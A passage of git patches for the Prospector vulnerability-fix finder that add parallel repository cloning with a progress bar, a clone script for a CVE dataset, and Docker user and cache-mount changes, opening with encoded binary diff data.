zg^9WIh$HVOteLJ=YN~h}F$ZP?@sZKZ`==|>8rhe%-SpdBG!8EqG%B;t=$mJxvWZ98 z+|x@#IdV{=fuUFEF7sY>4*yo?k%)pHoC>1mF22-sG+IWK0eiHYryu)e{r9v6+eOp8 z-C(q^v5>2FZR;n7F+2FD)uYZBP5U392K({u5>2zi#s@kN@OruE$~iCgZ7PHR{V}Hw z&-|-O90m36as5Fu=@gB#XVUzA zSBe0wESl8qy^WV_DT6!Hn+ai`vC!EOODmrWpwcknfaqLsV3LOvt!_XnAsH#5@cr&c z5)y10IaS78<=|Bw~%Q0p+X zW3On#rnZa0vUqQ|T$?E2ozM|f;vw{#yLfp#T*2l*d=!^tc>!!i!61>|?%46|@LXWJ zNpWr`#E{gLv(2ciVhh6KnrSyU_`vA(q@nb&XJ6*hw{&1uOBd7dp^li5KWOLbk@hd- z=E@HuwqP{?s*7H1l3UF}5n&45Jzi5&bI11W&q`My{1fQ~c|QacBNqCIcikIBkpJ%Q z74HkA^aI5-a5A$aXfLn_V}{wWi+WLY38GIEDGdwRS9&q#QuL43=Ivyk2DF`@@n=%I z$hk_K-_ao*QbwHpBGVp(8R2|L%=)UHp8fTD^}7H1yMd>~bvJo`KU?`b!gKrm-^vAB zLsX}d`WxD;wagZU#}&?aQd@}*xy$;1pB%#=W-7&(NLhHq=q*9#m$b^>Pl{xgdZ*07 zh~!I3C?B8hrlzv~{Cys`V{8Bn&Ebmo+A=t1+Vy~Wy&hSNY{Qj;|yW(J#$eM6^L`ECt^%B7=olo?mOGkpVDX(aid32Fk4qa$ZL>g2R?B^Siqi+J5 zVb~D4Bv1TLJJ1QSbQsbCanVo`*3~w)`i}RiW*(UGw3D_R9)+_$cKG|}KjhGhk?bA* z6NL-3$jA{56vNF(L~LJeUwG>c)c(|CZ~FJ&^rNB_iTH-qV?y(L{3> zKWcmyoA7TKqiq{o^Z+km^_-=YlkSDbDFz|}ah2ZRcO0XgsdThnStclDr!0G+ogC2r zk?T~7m#nRg3@ZqMM`4?!VZJY#@kuSp87c@b&jrAhP?n<9Rx83E;K{jO^B|d8 ztg3CCU0bl>=i7#gbaD=$9ZA_?C@l40L5l{C5slyA#{GrcU{VKU#j8k!N!%XMg54>) zaLZktLNsdB)`}ehdMZV;2nDP?KSaU*m7*HdYS!#k$g6>;Tq|o`p50{5rs{O6hGMKO z4XgMJFbkLQ8c`p=>~t;~lRXZ@{D)#T&FNd?Xt-`}UTyxFh9XELdsLo$w}2+n?*q%* zm&9=GqN@o4npMe{6H#>;O@wU9$>Ynn?b#DTu9Y5`C?(?u{a?2H(xPR{q$c&E6Lyhob5m{5*YJxZOmA8rybw zHTXogn-4^DSB@KDh02^JC9hhbu4>Czg*muEQOXZ6r95%rf@Ws#jKHmDg@03m~Um>h0RjL*D<2**pxc!fX&t*@EIZHkQ{OS`n2mP#h|46IPKK*TlkmW*`DLGwk~=1DVO88Tyc*j z{t|I|x6>zePp@gLC^H&$T?kxrLojYoIsk@L&opjQ;f z-?o!4com{Zk1KRfNC*5RC#RusJxmuV7EKNoB`Sgapf1(ar!^Z#&1DktBvAr|o%8Y% zpzP(E)mJ3A$YiOWG*J3SW4!+Q@8&##jA4ID9VMKryouF=WalRiU&(ifD4&Za zNroY5DPQB{Orr{3%)GG7P?p^6aXVUlCnGK1=Bzwv=K63|lldjzeP*aLBWd{DeQecY!k27X6=DQ+C8zproHS1l#mz*=PN_Jf~LhBQw zZSH#b%$Wa$AiBKF#KjfS5b_Z}xF{ZLeY2PI20%bqQ^Vdt!JWMB)ndWUJv;eTOdnC$5>xR8Nlz==`TkrO)%C5& zGj9?27c+DcYkFeAziDP^Kb%F67~Y~C8^Bw>Q_gwiBS^C>uU%xsWy!7pu_cK$8mmYA zgMkE34;%9Bv(LGTl9SSPCCyk^pgToM6)qdFM@BlM(x?OwnHy ziwr5kz$3S$?dvzQ^sJ20e0jUQpJ{<<0f532p&*Y@g{pxN9zcsw?SK5^AX#-NDOifZ z;*(zG!wFvQHr9Ri#x`2}%*QLZ%pv^4=dwu^i5`;HI39`U%$v+AviJdY1yYu+dUg63-{FPm zK0KL?6F0;aChB2l6H23Z=Ve!Zj;^1c%UP3KCOdx2yT^cwz3*v`n{o0FY~-i&-&Lju z|B#u_)2B}lnorR^QJSlZ>sMms=q>D-mxz>5KyhqqACtK$zsQszHabVx9!+fq`AUZw z(Jote-lH=ktt*oLjLKZJ0nyI!31i4@X&{5r2}h;Yq^hjbaGIj5-1p(vpTE3+;fhv1 z?yv}_?+XY@<_hLKy`u@hNQGd79Zmlkw4&CfbL(L0IA)KC&RY7Ac*h2VR z`-#z`sTM@|EY^Rl06>zMNN1`&LBNr(FK|9lp9Is!W?&5^``NyG=0lklk93A~p~R`w zm?ylZNp;C;4NW}Ranx?(^R98MMdy&ZiuXNQmJ;BHe7Q~n?y*NeAb&pk!OcE}Tm0kk z;k7cD$atK;>Ea_ICN>CIItb|z)MU9S+AN_*ZUZR;I={RwxwU)XqH~gCCiN@*Rus z15V5L?Z;>&&O`#5d$$z0m1?uKN5iS_33+kIfj>T~_g(b+x!+wht`|8zk19EYgTcS9 z`H=Iz0-Ce{0nQyxygkT^M>x=t)1w$q3jg#99}8)^rE?6WJXV7&INSpU-FjYJw4(~G za+tbI1QR>AZx3PzqF=ccZiRYC!mRRmOKqu6x`?`*V(szzpZAsQD_QtV3{IvcD#GH@ zcIbBhb)DEXz>C@~K0#56;B|^M3SX8DQp<_A8++SM03*I~WS?uFmLp~t454C{0T1R4 zgl42$`@`z?&>a$ z7U$7vXHEJf^2zr{zyJL!M*>f!Bi}Z?8B_Qvw0tLJRDdzA;fDgwQRaz=P=*$F5=YRC z<3}p_D&o9GVsgEH_C=9pt5(=QxcY{ba_E52L^mpyK>)UYaqgSwv)q5R6GsSegJM(% zxPQ+oh3XC=dJXIQZBJFRE)~WrhLBTbzknO~?`vsn3rb6}J&jLUl>Lu;_wPSJ5y`9> zi}hMnFq*Ynf)Qv3(l+VioKM8zSi_!T6T|`F8lf4GIU*4l^j-K=HV_X~i}_U0m@w*H z;PYLgZ)OOm12P$UVv(Su$^IKF<@cqvHKZRy0`)erH6D#G?1ic8GkS6^Nc8hkBGlC z_vFux_^=`l>}hIhRV<_|oW3F8A7p8|ynu@)crzEq9*khUIS*rE!KZ0uDCUVty?uv# zh4)1;pY+%znN!r!IDx$%BfmHgTVEeRlZ7ZLne9Ew)>d6#@Jipnpny8a&m-W&ug4c( zPhdAna2rotHfy7+m`y{UB`SHDMW-7%vN!&koB-sT$`OMSyE~gSyl6$Th{O|(dy74+ z?`%ho9t-9bPq!uY3xtR^GIGGi*v;lNDM6IQThU^qptcL)@vD4AhRP^U&YE4>FuG|1 z$Q&F%S-N_+rY?P{I}_&7&Rg1;KkjT|Fk*LhY!(e&RO&B3BR#*zJc?8*KTP;gu*hcj zl%-yxtl$qEkzYO??u>o~%9*S*OvC)FvJ)y34C$Z-U& zlrc&$p0Mfb0$pF;Y_95xK?XY5-MB3?I(4j{4T9={f*0VvAOU_=ea-0N!9Zc38lR>Gb znx_z<$#uZ@)a$fLxgAZ%S3(HLli-O=I&1u=Q&(EwqX5Mz?1g4fw$*8Z9>R+D^wxxq z7~OK600$mAvD6QWgtY@=J7c_E^fj#LWqPOin)7`#)6WCg5Ux{2e%owKLEQEoUSo#S zu8bppv-vG)PVp?>xVfe2)7WDdV&WO|=cB-%4TogZ;J&dhQWQNEOwsb}Rds-<*J~R5 zM2UJF7KHiwNjm#CazgyylKZ;nqq1FIGM z^rk>$?O&XmWkLnKPxbfvAW-76?<) zRgDKm<7@Xng!f~o{Zh2Li<#*dYIo@>sgSLwO`EoDR&BUrY0pL2!2=bU7TsOOwv`v2 zRDA4BVLH-RQa@V40kJv$I-}Z?GzwaTuf4H&b6`})yjnxSw__ zCN9)CDSqlC!V$tNN>=9ozha$QjvP6zN^A~%#p(dVQyWb^iBOb*hhSI~rPlv-K;5+6 zQ}NzA3SA1*+a2kcU;qqdFd?s3PIC;9kD~H+mHBgKY(Y9=*?Kr<$uK(@G)0FDOS%k3!jzj?&tX;j+7_0U0~F^-6i^vsi{dl3h*u7PQw?oE>DY zo{qR`0B~5}CznJ~K>+;q)P&6Lox64E4Dlf2P9*i}aVG|>C@U{A?)2xc>nq-E@rrh6 z-`sebH@$k^s?>xNG^>`QM(tYSS-V+ouKxc3VZfzpNi$_NhdG0uo*GK;6JVD&AjwJQ z;xE)*yJgG+4ilk1pc>!wWVS^x&A8KtdN-a{22e%6kcc5k&}YmlQxmY3S!sZatA7P%2)3Tl2-UtGzsB@Xq1qul>pD& zPK#btf$}>)ym@D^Q)h><2L!9ch&UM9SV5+LO(0L#7yu1tiSUkSZG{!mX4} za3htY`kx}O#S-U@32qnuN%(}n>WVZH@^$svwR>CDO`L^yxJV*>gYk>qevhl$i|vtI zowx0^8#g5UO4SYnwZH$0@hM;Qrz83o_Zk_|VW~O{SuM&9M<&ykzuYrh8b8p5G^kAb zhL49YOgOM+`Y>O<^(121V=SwH#&3dT6Z23i4dMo#N&!DpS&K1M^05j}|t9t`#9U>e>$p%O4O`=DF3(d@jQRbW{;Dm$u3+ z&ObW(K*CcupaB^*#~J33Zld-1^7cHTrd3ZWeYf}lm{=C1h2{E(p5c+}AHBGg(6Z)?)r1h(2Pb){36EcP4I9 zry$k~CWObxIH4GZ@sv1t|eZJ&Lw5KT2_&J$8E6I1YPoAn0$+^&7mBLhUK4bA8-+Pa6e$epC9zh^^ z>`n;h&ED4;nDZ{Cn=PX;Fk?gA@f+w`qvDdLO0|9ykWBzVgSx%?C=Q z6mp>h2Iyt(l3V_!{y(+q1MpC8z<*kET{9e5f@>cANU6b)nAoI)Q2iJ#* zz|&p+{4--U)Fb~saYIXdpm@_@W6mcEj(?&iiizyP-}wAcx!&a8z?Kj3We%Fg_}21U zLaY>xQp5T35nT~x8mhQ47pE*W;KOJ`<|N!A6bqxo*YYpqSG}$%ZlwC5hnrl`8rx-G z8H$g(Z;?PS7bMxwqfA7Kk4XJ-G6`7+{mVb9*F1P@z|evgYYvggR}`Bl*+VEIREQ~3 z0aSM)c-++_4pR9cL+JDrbija6UORk!0|`(@&NG{>(UZ|o)HjSX*r>}8c{7dHUVP@I zWINzlR9|Jy%f(EH=PN?nks5D~H~y64{sXca%Z*hrKs)!9;i#200!|S!GUlBz8c?|8 z@S84?{WG6Q83_odr$WW0E<(ev!V8XF_Ijjtk5ced6-qgsuY3oJJte3=we^fyAd+ zC$W{2kyjSBP|GM2&u>z}w8*F)h%1QLWr9FBV6ZB8sHUHh?I;KXX%?tMZf>lz)MR#z zXycLnaOX^7Xs`8XO|Ybjc1{oF%k)txOmF zLW32a+wVX+XBO}>uFt&Zji(ZIHG(D?Vgv^phx7~y$ZfI8$kxY=M;>){$^CG9BPt*f zYN^ME99+cym0eAy=RIG)xm(F@f_Ou`aOh7L-|hKWr`M8iOV1JW0CcA;&8gL}WuHHW z^>}uj%Mr&S4}e&;nZ^~tRHV`8Six;f=c}09PfXq@$QuFc!PV>6t?lggL8CFS@<#W? z%X!{xu!&HplAmmtU;6PF0R_^2X>Kkh1PQ&%;Z>Ty%m_ zv!Xu`*w}-$5&kMwZ$9zD&XbTH;-)ChFr*xW~89U0q z8zgKsKUDIB#NqRZ+0lF9C4YYF6ZrMQS9mAEX<#K%W@f;(xL2hz!;dtZ9ckob`dP}4 z_oEMbfs?CShCJ`5$umyP0r2C7fe9V1X!vAeFjdU*grt-WfHpk(^%;7Mw02v}p2kk- zK>8Eiz1l{yc5O#~RyG8s+l%F8469mGwQP7kn@#w5)t8^;^(aYGz@dq;huPe!j?w!1 z^r(WotG=9D!HQa%G#?DDLkF*T2SR|zpq2v#(p~h&A<9PLJz{D*ov!rbbI<=)E1;au z_D-*BEHn(i0(`e_{gM0o@*!8Oy28Jvz?e-$qX{h=3GypA%>TUZ0^E z8_%u~)1LGtlEA97$`qN=lzBKfemXe&hEsFB!p4RKRucSb`-LI3yj#57H>3}Z4+%Em zwHtd=ZCGA*H`ulZk{1!+13(}PcD`1x0|G%`M(8t)oTDT%y#cwjUsQ~4hL{PvlLrXi zTek_>p+|KvLwhlYS_$+Odd;0NKUhw{g4&1UqbrAcL2@nZl zl-oQ)-&+U9eqx$MT0sG3;3;Way7%a)WNOXH_YXtt0;p6xZfHIh!_m%o0-D2PiS`0LnCL`Dr0t*;_h;Ols z-cW^#NW*@MLHqV|sjS1FKp{PPVps5W$}Pdt5HBEklktkhIeffrbp>llG3}O>aJQs$ z!;2J^(^^?5-j9SKkaag`&~Gvu%Zd`?HzwxAz60-*lOmgWE29a|Lrpj-=T&SLqLtB? zDMzLtf|KWv7?wFFBI=l<=HnwYf~`aL`ugHB z44@r8hL&&uW1aLj7e?p+gsjAeQ$Ef+{WD$>H#aLeDSM{4j4mk$&zf^YKpSri~R45Wt#ZVtKEKrCXc9H<4NTx*%DNY4k zAjThi0Kn$CjX(~qb}YNtE|U008em-y&8Nmm{7_wMJJRC{L6`95Wed>i&!LZOnJxxm zPN~t@?BJa{cYYf7olN9hvU8*#mB zZ^V~*-hPsVC^*FwtVkAMZ|_sai?YYI=~5bK zsd&W5rH7|h_K}5{9r5wZD@|S4k3=FZ(e2wOtr|{SpXb9v@(!#H0psXWgei>GjTVb3 zE^Qn*1m2aXekcpZP;I4RszB>El5-nk#dd_@8DHWlk*z;yR=DGU5*;I;Rj^Gks<0ni`Lr~2-Aa#h6p^+z;qs3ghA=V>rr=`01K zLH(J$nYK&mJyV2ItO=(wrb*GC9blo5dpUH&ep+a*6DQRj6hD0m9GQ!e=3ho|kiafp z?5G&a_$n#-FlwIhh@m35z{LglMEu6=G zMguJl#|3Yp@8S+ESFFZD-lbARXW_5ITz?VvzVJm5lXGcGUDXkSIV?c%NI6fi5bBa-T=% z&^HNQPRrNeV)Uzpx&HYwfAo9Zre@k?bj9NLs+H=*K~r|5XINjXF7T%}ZP|$7@tY@H zH4>Yuh4ihOHeH-FpYAM-xK5B|ksx(#*u48MXviqT?or2%gW1G!@DOy<6p4I8Kggbp zm{5HasD(OH*;u;6u=?pi>crAuF1T4Vw7noy@rnvkgrW`5)?k=4Cr}@ajL@ebHvO`gQ9rRWcXp(p^SfxNt!_A{jKcIWl4lBz@(P z2O@!2iC~pZH~UDi_a{rNx-2cPYe#i!FxZzEQyRGLcXLCGJb3pWY1?9nXW@^C7txOP zvu9>}so>cp_Ul$ljM3Pszpq(?J9Gd>_GD=h8x5Dx(cn?;1fz|mAK!%G z``LU=j^lI7FHRF^AScuQ$eGIU4I;GT1EPmSnMUD_%poK)r;z+=sxoCJYyeQFgg3@9 zq#d%w8YZmZ9UQjo7^Eb=!J_VF8ZmZ8GVQy-mGn4tgu*Be^^&Bu^sgjnfWB8uF@&Z> zf&AE&mh=vBI}(-ahJa^hD>5<+-M9pF^nXmhh|b{`C>Rv0XdFlfHiRt zkXB?FGM&h-Etui=zm-$oYrAPy)|F}Ev4HkC56g)z#fxQZ7+g$78C#F2ojr)8zVWns z5H}{1XQgC``Zs_3QG4HugQN;{SvSWO$Oy00*ff_ISx`2-xb|6I`;XPlOAeVzUO5gh z$H3x^Kq^qb$cPTZb;fTX@;lWL+c+3oJ(c*CAPvq8U=~ZUSX*60WfoHZg{AvFcYdDN5R>BI+}zC(Pb zgp}f)7ND9w`@A$mV!Eh7gprb*_(zxdfCjB8Wdkd^aaqa%wWf*aVY`P)e#**s7KBNH zAZ_GCasM?*zlN?*DlpdaFkd-mLTpI0AgVr8`RDisn+Nn-)N9FC&YKi@zw0*<`Z7Jx zkyEA8KBEVcdPPo)VR*pM%bW2bJ^NM$kfnBVG3@1z0>*+a|fm+UhXxPknAQEGf z90REoSL%qij9+Ij(;^Az#C;w+cC3YCg{3tm3Ijeu7qgwg>qJWBY*~M)A3-S}lHYyP z`<*hWAHtst0maE*Jf0vB^{a5kc%@j0@|3&6U$4Cy5kr8rI#Vhauk>fH3 zuI+&$Dj!M77y!DP>ky|Y+28)cy)QicbJhmE5aiY?>Y1B=^4#x=`)Qq(GM%g!LeRF&>IHM* z8V6z2`i9hy*$=B%)h7N-2?(veftiv-#J)jj?~z`WtU((e$=qEbgx8g{l5nltDCcqWOPwAoaV@1 z{+fRag)bf_cthlkJ0Oy|kthi`Tq-=5igPk{tz%tWT$+^COiY&ZU|M@^60(T-2R=42 zz4{&PM{-szR0~^gq$0qLhwLGab{4LZwQbFt76~oSoYHEdK*Y~=w@pCTD!m2uL$^1% z>Kjb7ug1(%#F(>6pMYa++MW0m-6J~ASjmi~OctXK+27lKl^m)h-mCtx@sQy9qxK!6 z^_gTaI$%kbSBQSm>Zx8;l3_V%yIpO`*q$n0JZ1*eM3P}FQP`~O9)PFy)Th%95{%fDQRhOy$t<{JsMpXSf?-~E`Eq~EM{Pn@ze_;Xg skCSRv1_AXC{{OE8H2Ht^!M^jlGi$-(PE9w=mv^nQ81+l|plQGTAK!1LTmS$7 diff --git a/prospector/evaluation/data/results/summary_execution_results.tex b/prospector/evaluation/data/results/summary_execution_results.tex deleted file mode 100644 index 4bed03444..000000000 --- a/prospector/evaluation/data/results/summary_execution_results.tex +++ /dev/null @@ -1,28 +0,0 @@ -\begin{table} - \centering - \tiny - \begin{tabular}{ l c c c c c c} - \rowcolor{gray!50} \textbf{Result} & \textbf{MVI} & \textbf{\%} & \textbf{AVI} & \textbf{\%} & \textbf{NVI} & \textbf{\%} \\ - High confidence & 142 & 10.765731614859742 & 976 & 74.56 & 928 & 71.61 \\ %qui era 200 - \begin{tabular}{l} - \quad Commit in reference \\ - \end{tabular} & 0 & 0.0 & 865 & 66.08 & 865 & 66.75 \\ - \begin{tabular}{l} - \quad CVE ID in message \\ - \end{tabular} & 0 & 0.0 & 66 & 5.04 & 32 & 2.47 \\ - \begin{tabular}{l} - \quad CVE ID in Issue \\ - \end{tabular} & 0 & 0.0 & 4 & 0.31 & 1 & 0.08 \\ - \begin{tabular}{l} - \quad Cross Reference \\ - \end{tabular} & 19 & 1.4404852160727823 & 41 & 3.13 & 30 & 2.31 \\ - Medium confidence & 5 & 0.37907505686125853 & 97 & 7.41 & 50 & 3.86 \\ - Low confidence & 3 & 0.22744503411675512 & 90 & 6.88 & 45 & 3.47 \\ - Not found (rank $> 10$) & 46 & 3.4874905231235784 & 35 & 2.67 & 27 & 2.08 \\ - Not reported & 9 & 0.6823351023502654 & 97 & 7.41 & 232 & 17.90 \\ - False Positive & 0 & 0.0 & 14 & 1.07 & 14 & 1.08 \\ - \textbf{Total} & \textbf{1315} & & \textbf{1309} & & \textbf{1296} & - \end{tabular} - \caption{Summary of execution results (MVI=manually-supplied version intervals; AVI=automatically-determined version intervals; NVI=no version intervals supplied)} - \label{tab:tracer_dataset_results} -\end{table} \ No newline at end of file From c5d627a5feaeb81fe98b4bb3e6e62427f7025182 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 23 Jul 2024 15:07:44 +0000 Subject: [PATCH 053/130] corrects git cache path and adds docstring to do_clone --- prospector/evaluation/dispatch_jobs.py | 3 +- prospector/git/git.py | 78 ++++++++++++++++++++------ 2 files changed, 62 insertions(+), 19 deletions(-) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index f5e9b0072..0d8fc8c15 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -311,6 +311,7 @@ def run_prospector_and_generate_report( version_interval=v_int, backend_address=backend, enabled_rules=enabled_rules, + git_cache=config.git_cache, use_llm_repository_url=prospector_settings.run_with_llm, ) @@ -329,7 +330,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[:10] + # dataset = dataset[:10] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: diff --git a/prospector/git/git.py b/prospector/git/git.py index adf6eb853..b85b06922 100644 --- a/prospector/git/git.py +++ b/prospector/git/git.py @@ -13,6 +13,8 @@ from typing import Dict, List from urllib.parse import urlparse +from tqdm import tqdm + from git.exec import Exec from git.raw_commit import RawCommit from log.logger import logger @@ -25,14 +27,32 @@ HALF_MONTH_TIME_DELTA = 15 * 24 * 60 * 60 -# def do_clone(url, output_folder, shallow=False, skip_existing=False): -# git = Git(url, cache_path=output_folder, shallow=shallow) -# git.clone(shallow=shallow, skip_existing=skip_existing) -# return str(len(git.get_commits())) - - -def do_clone(): - pass +def do_clone(url, output_folder, shallow=False, skip_existing=False): + """ + This function clones a git repository from the given URL to the specified + output folder. It can perform a shallow clone and skip existing repositories if specified. + + Args: + url (str): The URL of the git repository to clone. + output_folder (str): The path to the folder where the repository should + be cloned to. + shallow (bool, optional): If True, perform a shallow clone. + skip_existing (bool, optional): If True, skip cloning if the repository + already exists. Defaults to False. + + Returns: + str: The number of commits in the cloned repository as a string. + + Raises: + GitError: If there's an error during the cloning process. + + Example: + >>> commit_count = do_clone("https://github.com/example/repo.git", "/path/to/output", shallow=True) + >>> print(f"The repository has {commit_count} commits.") + """ + git = Git(url, cache_path=output_folder, shallow=shallow) + git.clone(shallow=shallow, skip_existing=skip_existing) + return str(len(git.get_commits())) def clone_repo_multiple( @@ -44,13 +64,23 @@ def clone_repo_multiple( concurrent=multiprocessing.cpu_count(), ): """ - This is the parallelized version of clone_repo (works with a list of repositories). + This is the parallelized version of clone_repo (works with a list of + repositories). This uses a tqdm progress bar to show how many repos + have been cloned. """ logger.debug(f"Using {concurrent} parallel workers") - with multiprocessing.Pool(concurrent) as pool: - args = ((url, output_folder, proxy, shallow, skip_existing) for url in url_list) - results = pool.starmap(do_clone, args) + with multiprocessing.Pool(concurrent) as pool: + args = ( + (url, output_folder, shallow, skip_existing) for url in url_list + ) + results = list( + tqdm( + pool.starmap(do_clone, args), + total=len(url_list), + desc="Cloning repositories", + ) + ) return results @@ -159,7 +189,9 @@ def clone(self, shallow=None, skip_existing=False): if skip_existing: logger.debug(f"Skipping fetch of {self.url} in {self.path}") else: - logger.debug(f"Found repo {self.url} in {self.path}.\nFetching....") + logger.debug( + f"Found repo {self.url} in {self.path}.\nFetching...." + ) self.execute("git fetch --progress --all --tags --force") return @@ -181,7 +213,9 @@ def clone(self, shallow=None, skip_existing=False): silent=True, ) except Exception as e: - logger.error(f"Could not update remote in {self.path}", exc_info=True) + logger.error( + f"Could not update remote in {self.path}", exc_info=True + ) shutil.rmtree(self.path) raise e @@ -226,7 +260,9 @@ def get_commits( return self.parse_git_output(out) except Exception: - logger.error("Git command failed, cannot get commits", exc_info=True) + logger.error( + "Git command failed, cannot get commits", exc_info=True + ) return dict() @measure_execution_time(execution_statistics.sub_collection("core")) @@ -266,7 +302,9 @@ def create_commits( return self.parse_git_output(out) except Exception: - logger.error("Git command failed, cannot get commits", exc_info=True) + logger.error( + "Git command failed, cannot get commits", exc_info=True + ) return dict() def create_commit(self, commit_id: str) -> RawCommit: @@ -277,7 +315,9 @@ def create_commit(self, commit_id: str) -> RawCommit: return self.parse_git_output(out)[commit_id] except Exception: - logger.error("Git command failed, cannot get commits", exc_info=True) + logger.error( + "Git command failed, cannot get commits", exc_info=True + ) return None def parse_git_output(self, raw: List[str]) -> Dict[str, RawCommit]: @@ -357,7 +397,9 @@ def get_tag_for_version(self, version): best_match = ("", 0.0) for tag in tags: t_strip = re.sub("[^0-9]", "", tag) - match_score = difflib.SequenceMatcher(None, t_strip, version).ratio() + match_score = difflib.SequenceMatcher( + None, t_strip, version + ).ratio() # print(t, match_score) if match_score > best_match[1]: best_match = (tag, match_score) From 1d81fc1024d90d0f2e4c20f73c5057b3669cda99 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 24 Jul 2024 08:00:39 +0000 Subject: [PATCH 054/130] adds progress bar to clone_repo_multiple --- prospector/git/git.py | 43 ++++++++++++++++++++++++++++--------------- 1 file changed, 28 insertions(+), 15 deletions(-) diff --git a/prospector/git/git.py b/prospector/git/git.py index b85b06922..c991faf95 100644 --- a/prospector/git/git.py +++ b/prospector/git/git.py @@ -15,6 +15,7 @@ from tqdm import tqdm +import multiprocessing.pool as mpp from git.exec import Exec from git.raw_commit import RawCommit from log.logger import logger @@ -27,6 +28,28 @@ HALF_MONTH_TIME_DELTA = 15 * 24 * 60 * 60 +def istarmap(self, func, iterable, chunksize=1): + """Credit: https://stackoverflow.com/questions/57354700/starmap-combined-with-tqdm""" + self._check_running() + if chunksize < 1: + raise ValueError("Chunksize must be 1+, not {0:n}".format(chunksize)) + + task_batches = mpp.Pool._get_tasks(func, iterable, chunksize) + result = mpp.IMapIterator(self) + self._taskqueue.put( + ( + self._guarded_task_generation( + result._job, mpp.starmapstar, task_batches + ), + result._set_length, + ) + ) + return (item for chunk in result for item in chunk) + + +mpp.Pool.istarmap = istarmap + + def do_clone(url, output_folder, shallow=False, skip_existing=False): """ This function clones a git repository from the given URL to the specified @@ -37,18 +60,10 @@ def do_clone(url, output_folder, shallow=False, skip_existing=False): output_folder (str): The path to the folder where the repository should be cloned to. shallow (bool, optional): If True, perform a shallow clone. - skip_existing (bool, optional): If True, skip cloning if the repository - already exists. Defaults to False. + skip_existing (bool, optional): If True skip cloning if already exists. Returns: str: The number of commits in the cloned repository as a string. - - Raises: - GitError: If there's an error during the cloning process. - - Example: - >>> commit_count = do_clone("https://github.com/example/repo.git", "/path/to/output", shallow=True) - >>> print(f"The repository has {commit_count} commits.") """ git = Git(url, cache_path=output_folder, shallow=shallow) git.clone(shallow=shallow, skip_existing=skip_existing) @@ -58,7 +73,6 @@ def do_clone(url, output_folder, shallow=False, skip_existing=False): def clone_repo_multiple( url_list, output_folder, - proxy="", shallow=False, skip_existing=False, concurrent=multiprocessing.cpu_count(), @@ -68,15 +82,14 @@ def clone_repo_multiple( repositories). This uses a tqdm progress bar to show how many repos have been cloned. """ - logger.debug(f"Using {concurrent} parallel workers") - + print(f"Using {concurrent} parallel workers") with multiprocessing.Pool(concurrent) as pool: - args = ( + args = [ (url, output_folder, shallow, skip_existing) for url in url_list - ) + ] results = list( tqdm( - pool.starmap(do_clone, args), + pool.istarmap(do_clone, args), total=len(url_list), desc="Cloning repositories", ) From dc9deac51d2ba86a86405dddb7c89f251d296a27 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 24 Jul 2024 08:01:12 +0000 Subject: [PATCH 055/130] adds script to clone repos --- prospector/pipeline/cloning_repos.py | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 prospector/pipeline/cloning_repos.py diff --git a/prospector/pipeline/cloning_repos.py b/prospector/pipeline/cloning_repos.py new file mode 100644 index 000000000..c7ca17bbb --- /dev/null +++ b/prospector/pipeline/cloning_repos.py @@ -0,0 +1,26 @@ +from evaluation.utils import load_dataset +from git.git import clone_repo_multiple + + +# Get the URLs from d63.csv -> set +urls = set() +dataset = load_dataset( + "/home/i748376/prospector/project-kb/prospector/evaluation/data/input/d63.csv" +) + +for cve_record in dataset: + urls.add(cve_record[1]) + +urls = list(urls)[:10] + +print(f"Retrieved {len(urls)} distinct repositories from the dataset.") + +# Call clone_repo_multiple() on this set +results = clone_repo_multiple( + urls, + output_folder="/home/i748376/data/gitcache", + skip_existing=False, + shallow=False, +) + +print("Cloning completed. Results: ", results) From a9f961e8d7b13264a85e06507cf320bb9b3ff231 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 25 Jul 2024 08:56:17 +0000 Subject: [PATCH 056/130] executes prospector container with host user so that created files (eg. gitcaches) can be modified on the host --- prospector/core/prospector.py | 2 +- prospector/run_prospector.sh | 7 ++++++- 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index dfab128b5..44760f105 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -118,7 +118,7 @@ def prospector( # noqa: C901 ) # print(advisory_record.references) # obtain a repository object - repository = Git(repository_url, git_cache) + repository = Git(repository_url, cache_path=git_cache) with ConsoleWriter("Git repository cloning") as console: logger.debug( diff --git a/prospector/run_prospector.sh b/prospector/run_prospector.sh index 91288fbd5..8b450752a 100755 --- a/prospector/run_prospector.sh +++ b/prospector/run_prospector.sh @@ -36,4 +36,9 @@ fi # echo $(pwd)/$OUTPUT_DIR # Sanity Check # run the docker container -docker run --network=prospector_default --rm -t -v $(pwd)/$OUTPUT_DIR:/app/$OUTPUT_DIR $IMAGE_NAME "$@" +docker run --network=prospector_default --rm -t \ + --user $(id -u):$(id -g) \ + -v $(pwd)/$OUTPUT_DIR:/app/$OUTPUT_DIR \ + -v ${GIT_CACHE_HOST}:/tmp/gitcache \ + $IMAGE_NAME \ + "$@" From cfe7b7ee3678220cac57e45dc349d0ddd8020293 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 25 Jul 2024 12:31:15 +0000 Subject: [PATCH 057/130] adds comments, docstrings and improves logging of repo cloning --- prospector/core/prospector.py | 3 -- prospector/docker-compose.yml | 5 ++-- prospector/git/git.py | 53 +++++++++++++++++++++++++++-------- 3 files changed, 45 insertions(+), 16 deletions(-) diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 44760f105..20b269e41 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -121,9 +121,6 @@ def prospector( # noqa: C901 repository = Git(repository_url, cache_path=git_cache) with ConsoleWriter("Git repository cloning") as console: - logger.debug( - f"Downloading repository {repository.url} in {repository.path}" - ) repository.clone() tags = repository.get_tags() diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 370191b73..7e4becdc4 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -29,8 +29,9 @@ services: dockerfile: docker/worker/Dockerfile volumes: - 